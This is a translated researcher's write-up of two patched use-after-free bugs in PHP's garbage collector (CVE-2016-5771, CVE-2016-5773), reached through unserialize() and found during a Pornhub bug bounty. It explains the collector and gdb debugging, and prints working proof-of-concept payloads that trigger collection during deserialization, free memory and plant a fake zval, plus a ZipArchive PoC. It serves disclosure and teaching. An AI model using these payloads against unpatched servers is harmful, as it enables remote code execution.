Breaking garbage collection and deserialization in PHP

Original author: Ruslan Habalov
  • Transfer


Hey PHP, these variables look like trash, right?
Not? Well, look again ...


tl; dr:
We found two use-after-free vulnerabilities in the garbage collection algorithm in PHP:

  • One is present in all versions of PHP 5 ≥ 5.3 (fixed in PHP 5.6.23).
  • The second is in all versions of PHP ≥ 5.3, including versions of PHP 7 (fixed in PHP 5.6.23 and PHP 7.0.8).

Vulnerabilities can be remotely applied via the PHP deserialization function. Using them, we found RCE on pornhub.com, for which we received a bonus of $ 20,000 plus $ 1,000 for each of the two vulnerabilities from the Internet Bug Bounty committee on Hackerone .

While testing Pornhub, we found two critical leaks in the SM algorithm ( How we broke PHP, hacked Pornhub and earned $ 20,000 ). We are talking about two important use-after-free vulnerabilities that manifest themselves when the SM algorithm interacts with certain PHP objects. They lead to far-reaching consequences like using deserialization to remotely execute code on the target system. In the article we will consider these vulnerabilities.

After fuzzing deserialization and analyzing interesting cases, we highlighted two evidence of the possibility of use-after-free vulnerabilities. If you are interested in how we came to them, then read the material here . One example:

$serialized_string = 'a:1:{i:1;C:11:"ArrayObject":37:{x:i:0;a:2:{i:1;R:4;i:2;r:1;};m:a:0:{}}}';
$outer_array = unserialize($serialized_string);
gc_collect_cycles();
$filler1 = "aaaa";
$filler2 = "bbbb";
var_dump($outer_array);
// Result:
// string(4) "bbbb"

You probably think that the result will be something like this:

array(1) { // внешний массив
    [1]=>
    object(ArrayObject)#1 (1) {
        ["storage":"ArrayObject":private]=>
        array(2) { // внутренний массив
            [1]=>
            // Ссылка на внутренний массив
            [2]=>
            // Ссылка на внешний массив
        }
    }
}

In any case, after execution, we see that the external array (referenced by it $outer_array) is freed, and its zval is overwritten by zval $filler2. And as a result we get bbbb. The following questions arise:

  • Why is an external array freed up at all?
  • What does it do gc_collect_cycles()and is it really necessary to call it manually? This is very inconvenient for remote use, because many scripts and installations do not call this function at all.
  • Even if we can call it during deserialization, will this example work?

It seems like all the magic happens in the function gc_collect_cyclesthat calls the PHP garbage collector. We need to better understand her in order to deal with this mysterious example.

Content

PHP garbage collection


In earlier versions of PHP, it was not possible to deal with memory leaks due to circular references. The SM algorithm appeared in PHP 5.3.0 ( PHP manual - Collecting Cycles ). The collector is active by default, it can be initiated using the setting zend.enable_gcin php.ini.

Please note: basic knowledge of PHP internals, memory management, and things like zval and link counting is needed. If you do not know what it is, then first check out the basics: PHP Internals Book - Basic zval structure and PHP Internals Book - Memory managment .

Circular links


To understand the nature of circular references, consider an example:

$test = array();
$test[0] = &$test;
unset($test);

Since it $testrefers to itself, its reference counter is 2. But even if you do unset($test)and the counter becomes 1, the memory will not be freed: a leak will occur. To solve this problem, the PHP developers created the SM algorithm in accordance with the IBM document “ Concurrent Cycle Collection in Reference Counted Systems ”.

Collector Initiation


The main implementation is available here: Zend / zend_gc.c . Each time a zval is destroyed, that is, when it is unset, the SM algorithm is applied, which checks whether it is an array or an object. All other data types (primitives) cannot contain circular references. Verification is implemented by calling the function gc_zval_possible_root. Any such potential zval is called root and is added to the list gc_root_buffer.

These steps are repeated until one of the conditions is met:

  • gc_collect_cycles () is called manually.
  • The amount of memory for storing garbage is full. This means that 10,000 zvals are stored in the root buffer, and now another one will be added. The 10,000 limit is set by default in GC_ROOT_BUFFER_MAX_ENTRIES in the header section of Zend / zend_gc.c . The next zval will call again gc_zval_possible_root, and that one will already call gc_collect_cyclesto process and clear the current buffer so that new elements can be saved.

Graph Marking Algorithm for Cycle Collection


The SM algorithm is a graph marking algorithm applied to the current graph structure. Graph nodes are zval's like arrays, strings or objects. Ribs are links / links between zval's.

For marking nodes, the algorithm for the most part uses the following colors:

  • Purple : The potential root of the collection cycle. A node may be the root of a circular reference. All nodes initially added to the garbage buffer are marked in magenta.
  • Gray : potential member of the collection cycle. A node may be part of a circular reference.
  • White : member of the collection cycle. The node must be freed after the algorithm stops.
  • Black : in use or already freed. The node must not be released under any circumstances.

To understand the operation of the algorithm, take a look at its implementation. Garbage collection is performed in gc_collect_cycles:

"Zend/zend_gc.c"
[...]
ZEND_API int gc_collect_cycles(TSRMLS_D)
{
[...]
        gc_mark_roots(TSRMLS_C);
        gc_scan_roots(TSRMLS_C);
        gc_collect_roots(TSRMLS_C);
[...]
        /* Free zvals */
        p = GC_G(free_list);
        while (p != FREE_LIST_END) {
            q = p->u.next;
            FREE_ZVAL_EX(&p->z);
            p = q;
        }
[...]
}

This function takes care of the following four simple operations:

  1. gc_mark_roots(TSRMLS_C): Applies zval_mark_greyto all magenta elements in gc_root_buffer. In relation to the current zval, it zval_mark_greydoes the following:
    • - returns if zval is already grayed out;
    • - marks zval in gray;
    • - gets all the child zval's (only if the current zval is an array or object);
    • - decrements the reference counts of child zval's by 1 and calls it zval_mark_grey.

    In general, at this stage, the root and other available zvals are marked in gray; link counts are decremented for all of these zval's.
  2. gc_scan_roots (TSRMLS_C): applies zval_scan (unfortunately, zval_mark_white is not called) to all elements in gc_root_buffer. In relation to the current zval, zval_scan does the following:
    - returns if zval is not gray;
    - if the reference count is greater than zero, it calls zval_scan_black (unfortunately, zval_mark_black is not called). In essence, zval_scan_black cancels all the actions previously performed by zval_mark_grey to all counters, and marks black all available zval's;
    - the current zval is marked in white, and zval_scan is applied to all child zval's (only if the current zval is an array or object).
    In general, at this stage, it is determined which of the gray zval's now needs to be marked in black or white.
  3. gc_collect_roots(TSRMLS_C): link counts are restored for all white zval's. They are also added to the list gc_zval_to_freeequivalent to the list gc_free_list.
  4. Finally, all elements gc_free_listthat are marked with white are freed .

This algorithm identifies and releases all elements of circular references, first marking them with white, then collecting and releasing them. A more detailed implementation analysis revealed the following potential conflicts:

  • At step 1.4, it zval_mark_greydecrements the counters of all child zval's until they are checked for gray marking.
  • Since the reference counts of zval's are temporarily decremented, any side effect (like checking the weakened counters) or other manipulations can lead to disastrous consequences.

POC analysis


Armed with new knowledge about the garbage collector, we can re-analyze the example with the discovered vulnerability. Call the following serialized line:

$serialized_string = 'a:1:{i:1;C:11:"ArrayObject":37:{x:i:0;a:2:{i:1;R:4;i:2;r:1;};m:a:0:{}}}';

Using gdb, we can use the standard PHP 5.6 .gdbinit , as well as a custom routine to dump the contents of the garbage collector buffer.

define dumpgc
    set $current = gc_globals.roots.next
    printf "GC buffer content:\n"
    while $current != &gc_globals.roots
        printzv $current.u.pz
        set $current = $current.next
    end
end

Now set the breakpoint at gc_mark_rootsand gc_scan_rootsto see the status of all relevant link counters.

We need to find the answer to the question: why is the external array freed? We load the php process into gdb, set breakpoints and execute the script.

(gdb) r poc1.php
[...]
Breakpoint 1, gc_mark_roots () at [...]
(gdb) dumpgc
GC roots buffer content:
[0x109f4b0] (refcount=2) array(1): { // outer_array
    1 => [0x109d5c0] (refcount=1) object(ArrayObject) #1
  }
[0x109ea20] (refcount=2,is_ref) array(2): { // inner_array
    1 => [0x109ea20] (refcount=2,is_ref) array(2): // reference to inner_array
    2 => [0x109f4b0] (refcount=2) array(1): // reference to outer_array
  }

As you can see, after deserialization, both arrays (internal and external) are added to the garbage collector buffer. If we continue and break into gc_scan_roots, we will get the following states of link counters:

(gdb) c
[...]
Breakpoint 2, gc_scan_roots () at [...]
(gdb) dumpgc
GC roots buffer content:
[0x109f4b0] (refcount=0) array(1): { // внешний массив
        1 => [0x109d5c0] (refcount=0) object(ArrayObject) #1
    }

gc_mark_rootsreally decremented all counters to zero. Consequently, these nodes in the next steps can be marked in white and later released. But the question arises: why did the counters reset to zero in the first case?

Debug unexpected behavior


Let’s go through step by step gc_mark_rootsand zval_mark_greyto understand what is happening.

  1. zval_mark_greyapplied to outer_array(remember that outer_arrayadded to the garbage collector buffer).
  2. outer_arraymarked in gray, and all of his descendants are recovered. In our case, there is outer_arrayonly one descendant:
    “object(ArrayObject) #1”(refcount = 1).
  3. The reference counter of the descendant or ArrayObjectdecremented:
    “object(ArrayObject) #1”(refcount = 0).
  4. zval_mark_greyapplied to ArrayObject.
  5. This object is marked in gray, and all of its descendants are extracted. In this case, they include links to inner_arrayand to outer_array.
  6. Link counts for both descendants, that is, for both zval'es referenced, are decremented:
    “outer_array” (refcount = 1) and “inner_array” (refcount = 1).
  7. zval_mark_grey applied to outer_array without any effect, because outer_array is already marked in gray (it was processed in the second stage).
  8. zval_mark_greyapplied to inner_array. It is marked in gray and all of its children are checked out. Children are the same as in the fifth stage.
  9. The reference counts of both descendants are again decremented:
    “outer_array” (refcount = 0) and “inner_array” (refcount = 0).
  10. No more zval'ov left, zval_mark_greyinterrupted.

So, the links contained in inner_arrayor ArrayObjectare decremented twice ! This is definitely an unexpected behavior, because any link should be decremented once. In particular, there should not be an eighth stage at all, because all the elements have already been processed and marked earlier, in the sixth stage.

Please note: the labeling algorithm assumes that each element can have only one parent element. Obviously, in this case this assumption is erroneous.

So why can one element be returned as a child of two different parents?

One descendant of two different parents?


To answer this question, you need to study how child zval's are extracted from parent objects:

"Zend/zend_gc.c"
[...]
static void zval_mark_grey(zval *pz TSRMLS_DC)
{
[...]
        if (Z_TYPE_P(pz) == IS_OBJECT && EG(objects_store).object_buckets) {
	        if (EXPECTED(EG(objects_store).object_buckets[Z_OBJ_HANDLE_P(pz)].valid &&
		             (get_gc = Z_OBJ_HANDLER_P(pz, get_gc)) != NULL)) {
[...]
                    HashTable *props = get_gc(pz, &table, &n TSRMLS_CC);
[...]
}

If the processed zval is an object, then the function will call a special handler get_gc. It should return a hash table with all descendants. After further debugging, I found that this leads to a call spl_array_get_properties:

"ext/spl/spl_array.c"
[...]
static HashTable *spl_array_get_properties(zval *object TSRMLS_DC) /* {{{ */
{
[...]
    result = spl_array_get_hash_table(intern, 1 TSRMLS_CC);
[...]
    return result;
}

In general, the hash table of the internal array is returned here ArrayObject. The error is that it is used in two different contexts when an algorithm tries to gain access:

  • to the descendant zval’а ArrayObject;
  • to the descendant inner_array.

It may seem to you that something was lost at the first stage, because returning the hash table inner_arrayis almost the same as processing at the first stage, when it should be grayed out, therefore, inner_arrayit should not be processed again at the second stage!

Therefore, the question arises: why was inner_arraynot marked gray in the first stage? Let's see again how to zval_mark_greyextract the descendants of the parent object:

HashTable *props = get_gc(pz, &table, &n TSRMLS_CC);

This method should call the object garbage collection function. It looks like this:

"ext/spl/php_date.c"
[...]
static HashTable *date_object_get_gc(zval *object, zval ***table, int *n TSRMLS_DC)
{
    *table = NULL;
    *n = 0;
    return zend_std_get_properties(object TSRMLS_CC);
}

As you can see, the returned hash table should contain only its own properties. It also stores the zval parameter table, which is passed by reference and is used as the second "return parameter". This zval must contain all the zvals referenced by the object in other contexts. For example, all objects / zval's can be stored in SplObjectStorage.

For our specific scenario c, ArrayObjectwe can expect that zval tablewill contain a link to inner_array. Then why spl_array_get_gcis called instead spl_array_get_properties?

The missing function of the collector and the consequences of this


The answer is simple: spl_array_get_gcdoes not exist! PHP developers forgot to implement the garbage collection function for ArrayObjects. But this still does not explain why it is called spl_array_get_properties. To find out, let's look at initializing objects in general:

"Zend/zend_object_handlers.c"
[...]
ZEND_API HashTable *zend_std_get_gc(zval *object, zval ***table, int *n TSRMLS_DC) /* {{{ */
{
    if (Z_OBJ_HANDLER_P(object, get_properties) != zend_std_get_properties) {
        *table = NULL;
        *n = 0;
        return Z_OBJ_HANDLER_P(object, get_properties)(object TSRMLS_CC);
[...]
}

The standard behavior of the missing garbage collection function depends on the object's own method get_properties, if one is specified.

Fuh, it seems we have found the answer to the first question. The main reason for the vulnerability: the garbage collection function ArrayObjectsdoes not exist.

Strange enough, it appeared in PHP 7.1.0 alpha2 almost immediately after the release. It turns out that vulnerabilities are affected by all versions of PHP ≥ 5.3 and PHP <7. Unfortunately, as we will see later, this bug cannot be triggered during deserialization without additional body movements. So later I had to prepare the possibility of using an exploit. From now on, we will call the vulnerability a “double decrement bug”. It is described here: PHP Bug - ID 72433 - CVE-2016-5771 .

Solving Remote Execution Issues


We still need answers to two of the three initial questions. Let's start with this: is it really necessary to manually call gc_collect_cycles?

Initiating the collector during deserialization


At first, I strongly doubted that we would be able to initiate the collector. However, as mentioned above, there is a way to automatically call the garbage collector - when reaching the limit of the garbage buffer by the number of potential root elements. I came up with a method like this:

define("GC_ROOT_BUFFER_MAX_ENTRIES", 10000);
define("NUM_TRIGGER_GC_ELEMENTS", GC_ROOT_BUFFER_MAX_ENTRIES+5);
$overflow_gc_buffer = str_repeat('i:0;a:0:{}', NUM_TRIGGER_GC_ELEMENTS);
$trigger_gc_serialized_string = 'a:'.(NUM_TRIGGER_GC_ELEMENTS).':{'.$overflow_gc_buffer.'}';
unserialize($trigger_gc_serialized_string);

If you look at the above gdb, you will see what was gc_collect_cyclesreally called. This trick only works because deserialization allows you to pass the same index many times (in this example, index 0). When reusing the array index, the reference count of the old element must be decremented. To do this, the deserialization process calls zend_hash_update, which calls the destructor of the old element.

Each time zval is destroyed, the SM algorithm is applied. This means that all arrays created will begin to fill the garbage buffer until it overflows, after which it will be called gc_collect_cycles.

Incredible news! We do not need to manually initiate the garbage collection process on the target system. Unfortunately, a new, even more difficult problem has arisen.

Deserialization is a tough opponent


At the moment, the question remains unanswered: even if during deserialization we can call the collector, will the double decrementing bug still work in the context of deserialization?

After testing, we quickly came to the conclusion that the answer is no. This is a consequence of the fact that the values ​​of reference counters of all elements during deserialization are higher than after it . The deserializer tracks all deserializable elements so that links can be customized. All these entries are stored in a list var_hash. And when deserialization comes to an end, records are destroyed using the function var_destroy.

In this example, you yourself can observe the problem of large link counters:

$reference_count_test = unserialize('a:2:{i:0;i:1337;i:1;r:2;}');
debug_zval_dump($reference_count_test);
/*
Result:
array(2) refcount(2){
  [0]=>
  long(1337) refcount(2)
  [1]=>
  long(1337) refcount(2)
}
*/

The counter of the integer zval 1337 after deserialization is 2. Having set the breakpoint before the deserialization stops (for example, in a call var_destroy) and dumping the contents var_hash, we will see the following counter values:

[0x109e820] (refcount=2) array(2): {
    0 => [0x109cf70] (refcount=4) long: 1337
    1 => [0x109cf70] (refcount=4) long: 1337
  }

The double decrement bug allows us to double decrement the counter of any selected item. However, as we see from these figures, for every additional link assigned to any element, we have to pay by increasing the reference counter by 2.

When I was lying in insomnia at four in the morning and thinking about all these problems, I finally remembered one important thing: the deserialization function ArrayObjecttakes reference to another array to initialize. That is, if you deserialize ArrayObject, you can simply reference any array that is already deserialized. This allows you to double-decrement all records of a specific hash table. The sequence of actions is as follows:

  • We have a target zval X that needs to be freed.
  • Create an array Y containing several references to zval X:
    array(ref_to_X, ref_to_X, […], ref_to_X)
  • We create ArrayObjectone that will be initialized with the contents of the array Y. Therefore, it will return all descendants of the array Y when processed by the marking algorithm of the garbage collector.

Using this instruction, we can manipulate the marking algorithm to double-process all the links in the Y array. But, as mentioned above, creating a link will cause the reference counter to increase by 2 during deserialization. So double processing the link will be equivalent to as if we initially ignored the link. The trick is to add the following paragraph to our sequence of actions:

  • We create an additional one ArrayObjectwith the same settings as the previous one.

When the labeling algorithm moves to the second one ArrayObject, it will start decreasing all links in the Y array for the third time. Now we can get a negative delta of the link counter and reset the counter of any target zval!

Since these ArrayObjectare used to decrement counters, I will now call them DecrementorObject's.

Unfortunately, even after we managed to reset the counter of any target zval, the SM algorithm does not free them ...

Destruction of decrement counter references


After lengthy debugging, I discovered a key problem with the above sequence of actions. I assumed that as soon as the knot is marked white, it is finally freed. But it turned out that the white knot could later be marked black again.

Here's what happens in our sequence of actions:

  • As soon as gc_mark_rootsthey are zval_mark_greycompleted, the reference counter of the target zval becomes equal to 0.
  • Next, the garbage collector will execute gc_scan_rootsto determine which zval's can be marked white and which black. At this point, the target zval is marked white (because its counter is 0).
  • When our function goes to DecrementorObject'am, it will find that their own counters are greater than 0, and will mark in black theirs and their descendants. Unfortunately, our target zval is also a child of DecrementorObject'am. Therefore, it is marked in black.

So, we need to somehow get rid of the evidence of decrement. It is also necessary to make sure that our counters are DecrementorObjectreset to zero after completion zval_mark_grey. After searching for the simplest solution, I came to the conclusion that you need to change the sequence of actions like this:

  array( ref_to_X, ref_to_X,  DecrementorObject, DecrementorObject)
  -----                       ------------------------------------
/*  |                                          |
target_zval                     each one is initialized with the
    X                                 contents of array X
*/

The advantage of the changes is that they DecrementorObjectnow also decrement their own counters. This will help to achieve the state when the target array and all its descendants will receive zeroed counters after it gc_mark_rootsprocesses all zval's. Thanks to this idea and additional improvements, you can come to this example:

define("GC_ROOT_BUFFER_MAX_ENTRIES", 10000);
define("NUM_TRIGGER_GC_ELEMENTS", GC_ROOT_BUFFER_MAX_ENTRIES+5);
// Переполнение мусорного буфера.
$overflow_gc_buffer = str_repeat('i:0;a:0:{}', NUM_TRIGGER_GC_ELEMENTS);
// decrementor_object будет инициализирован с помощью содержимого целевого массива ($free_me).
$decrementor_object = 'C:11:"ArrayObject":19:{x:i:0;r:3;;m:a:0:{}}';
// Следующие ссылки в ходе десериализации будут указывать на массив $free_me (id=3).
$target_references = 'i:0;r:3;i:1;r:3;i:2;r:3;i:3;r:3;';
// Настроим целевой массив, т. е. массив, который должен быть освобождён в ходе десериализации.
$free_me = 'a:7:{'.$target_references.'i:9;'.$decrementor_object.'i:99;'.$decrementor_object.'i:999;'.$decrementor_object.'}';
// Инкрементируем на 2 счётчик ссылок каждого decrementor_object.
$adjust_rcs = 'i:99;a:3:{i:0;r:8;i:1;r:12;i:2;r:16;}';
// Запустим сборщик мусора и освободим целевой массив.
$trigger_gc = 'i:0;a:'.(2 + NUM_TRIGGER_GC_ELEMENTS).':{i:0;'.$free_me.$adjust_rcs.$overflow_gc_buffer.'}';
// Добавим триггер СМ и ссылку на целевой массив.
$payload = 'a:2:{'.$trigger_gc.'i:0;r:3;}';
var_dump(unserialize($payload));
/*
Result:
array(1) {
    [0]=>
    int(140531288870456)
}
*/

As you can see, you no longer need to manually start gc_collect_roots! The target array ( $free_mein this example) is freed, and a number of strange things happened to it, so in the end we still have the heap address.

Why did it happen so?

  1. The collector was initiated, the target array was freed. Then the collector was interrupted, and control was returned to the deserializer.
  2. Освобождённое пространство будет перезаписано следующим zval’ом. Помните, что мы инициировали сборщик мусора с помощью многочисленных последовательных структур ‘i:0;a:0:{}’. Один из элементов запускает сборщик для следующего zval’а, создаваемого после ‘i:0;’, что является целочисленным индексом следующего массива, который будет определён. Иными словами, у нас есть строка ‘[…]i:0;a:0:{} X i:0;a:0:{} X i:0;a:0:{}[…]’, в которой произвольный X инициирует сборщик мусора. После этого продолжится десериализация данных, которые заполнят ранее освобождённое пространство.
  3. Our freed space temporarily contains this integer zval. When deserialization is close to completion, a function will be called var_destroythat will free this integer element. The memory manager will overwrite the first bytes of the freed space with the address of the last freed space. However, the type of the last zval — integer — is preserved.

As a result, we see the address of the heap. Perhaps this is not so easy to figure out on the fly, but the only important conclusion is to understand where the collector is initiated and where new values ​​are generated to fill the fresh freed space.

Now you can gain control of it.

Free Space Control


The normal control procedure is to fill the space with fake zvals. Using the dangling pointer, you can then make a memory leak or control the processor instruction pointer. In our example, to use the freed space you need to do several things:

  • Free several variables so that you can fill the space of one of them with the contents of the string of our fake zval, instead of filling the space with the zval of the string of the fake zval.
  • "Stabilize" the freed space that will be filled with the zval of the fake zval line. If this is not done, during deserialization the line of the fake zval will simply be freed, which will ruin it.
  • Ensure the correct alignment of freed space and strings of false zval'ov. Also make sure that the spaces freed by the collector are immediately filled with rows of fake zval's. I managed to achieve this using the “sandwich” technique.

I will not go into details, but just leave this POC for you:

define("GC_ROOT_BUFFER_MAX_ENTRIES", 10000);
define("NUM_TRIGGER_GC_ELEMENTS", GC_ROOT_BUFFER_MAX_ENTRIES+5);
// Создаём строку фальшивого zval’а, которая позднее заполнит освобождённое пространство.
$fake_zval_string = pack("Q", 1337).pack("Q", 0).str_repeat("\x01", 8);
$encoded_string = str_replace("%", "\\", urlencode($fake_zval_string));
$fake_zval_string = 'S:'.strlen($fake_zval_string).':"'.$encoded_string.'";';
// Создаём «бутербродную» структуру:
// TRIGGER_GC;FILL_FREED_SPACE;[...];TRIGGER_GC;FILL_FREED_SPACE
$overflow_gc_buffer = '';
for($i = 0; $i < NUM_TRIGGER_GC_ELEMENTS; $i++) {
    $overflow_gc_buffer .= 'i:0;a:0:{}';
    $overflow_gc_buffer .= 'i:'.$i.';'.$fake_zval_string;
}
// decrementor_object будет инициализирован с помощью содержимого целевого массива ($free_me).
$decrementor_object = 'C:11:"ArrayObject":19:{x:i:0;r:3;;m:a:0:{}}';
// Следующие ссылки во время десериализации будут указывать на массив $free_me (id=3).
$target_references = 'i:0;r:3;i:1;r:3;i:2;r:3;i:3;r:3;';
// Настроим целевой массив, т. е. массив, который должен быть освобождён в ходе десериализации.
$free_me = 'a:7:{i:9;'.$decrementor_object.'i:99;'.$decrementor_object.'i:999;'.$decrementor_object.$target_references.'}';
// Инкрементируем на 2 счётчик ссылок каждого decrementor_object.
$adjust_rcs = 'i:99999;a:3:{i:0;r:4;i:1;r:8;i:2;r:12;}';
// Запустим сборщик мусора и освободим целевой массив.
$trigger_gc = 'i:0;a:'.(2 + NUM_TRIGGER_GC_ELEMENTS*2).':{i:0;'.$free_me.$adjust_rcs.$overflow_gc_buffer.'}';
// Добавим триггер СМ и ссылку на целевой массив.
$stabilize_fake_zval_string = 'i:0;r:4;i:1;r:4;i:2;r:4;i:3;r:4;';
$payload = 'a:6:{'.$trigger_gc.$stabilize_fake_zval_string.'i:4;r:8;}';
$a = unserialize($payload);
var_dump($a);
/*
Result:
array(5) {
[...]
    [4]=>
    int(1337)
}
*/

In this example, you can see how, after all our efforts, it is possible to create an artificial integer variable.

At this point, the payload was ready for use in the exploit. Please note that for the sake of it you can optimize the code. For example, to minimize the size of the payload, apply the “sandwich” technique only for the last 20% of the elements 'i: 0; a: 0: {}'.

Use-after-free ZipArchive class vulnerability


Another vulnerability that we reported in this context was PHP Bug - ID 72434 - CVE-2016-5773 . It is based on the same error: the unrealized garbage collection function inside the ZipArchive class. However, the use of this vulnerability is quite different from the vulnerability described above.

Since the reference counts of zval's are temporarily decremented, any side effect (like checking the weakened counters) or other manipulations can lead to disastrous consequences.

Just in this case, the vulnerability can be exploited. First, we let the marking algorithm weaken the reference counts, and then instead of the correct garbage collection function, we call it php_zip_get_properties. In this way, we free some particular element. Take a look at an example:

$serialized_string = 'a:1:{i:0;a:3:{i:1;N;i:2;O:10:"ZipArchive":1:{s:8:"filename";i:1337;}i:1;R:5;}}';
$array = unserialize($serialized_string);
gc_collect_cycles();
$filler1 = "aaaa";
$filler2 = "bbbb";
var_dump($array[0]);
/*
Result:
array(2) {
    [1]=>
    string(4) "bbbb"
[...]
*/

It should be mentioned that in normal conditions it is impossible to create references to zval'es that are not deserialized yet. This payload uses a small trick to circumvent the limitation:

[...] i:1;N; [...] s:8:"filename";i:1337; [...] i:1;R:REF_TO_FILENAME; [...]

This creates a NULL record with index 1, which is later overwritten with a link to the file name. The garbage collector will only see “i: 1; REF_TO_FILENAME; [...] s: 8: ”filename”; i: 1337; [...] ”. This trick is necessary to make sure that the link count of the integer zval “filename” has been weakened before any side effects come into play.

Conclusion


Preparing these bugs for remote use was a very difficult task. One problem was solved, as a new one arose. In the article, we examined one of the approaches to solving a rather complicated problem. Consistently asking ourselves thoughtful questions, concentrating on the gradual receipt of each answer and analyzing the definitions, we finally coped with the difficulties and reached the goal.

It was interesting to observe the interaction of two completely unrelated PHP components: a deserializer and a garbage collector. Personally, I got a lot of pleasure and learned a lot by analyzing their behavior. So I can recommend you to reproduce all of the above for training. This is especially important: the article is quite long, but even in it I did not highlight a number of details.

The script used a deserializer, but you can do without it, at least for local exploitation of vulnerabilities. This distinguishes them from the usual surface-lying vulnerabilities that were used to audit deserialization in earlier versions of PHP. In any case, as stated at the beginning of the article: never resort to deserialization with user input, but rather rely on less complex methods like JSON.

The experiment confirmed that we can use one of the discussed vulnerabilities for remote code execution on pornhub.com. This makes the garbage collector in PHP an interesting candidate for attack.

image
Garbage collection zval'ov went somehow wrong.

Also popular now: